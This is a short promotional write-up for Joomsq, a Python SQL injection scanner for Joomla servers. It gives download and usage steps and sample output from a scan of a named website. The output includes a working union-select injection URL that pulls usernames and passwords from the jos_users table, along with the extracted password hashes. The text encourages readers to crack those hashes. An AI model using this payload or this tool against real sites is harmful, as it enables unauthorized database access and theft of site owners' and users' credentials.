Joomsq.pl
Joomla Sql Injection Scanner is an exceedingly quick python based vulnerability scanner that can be utilized against Joomla servers. It is regularly updated by the author with the current exploitable holes (sql injection) that affect Joomla and is also extremely easy to use. Successful use of the tool will almost certainly provide you with a nice MD5 hash for the website to put into/ submit to your favourite MD5 cracker.
Installation:
Download the file
Python needs to be installed.
Execution:
Usage: ./joomsq.py
Example Output:
C:\Python25>joomsq.py www.mgn-games.org
Joomla Sql Injection Scanner v 1.0
beenudel1986[at]gmail[dot]com
[+] JoomlaPath: www.mgn-games.org
[+] Vuln. Loaded: 67
[+] Testing...
Host: http://www.mgn-games.org/index.php?option=com_pcchess&Itemid=61&page=playe
rs&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from
/**/jos_users/*
Found:
- 5e48e4c3a47af5dbfb0a0edcc0fbca55
- 5e48e4c3a47af5dbfb0a0edcc0fbca55
- 5e48e4c3a47af5dbfb0a0edcc0fbca55
- 5e48e4c3a47af5dbfb0a0edcc0fbca55
[-] Done
Right Click Download Link> save file/link as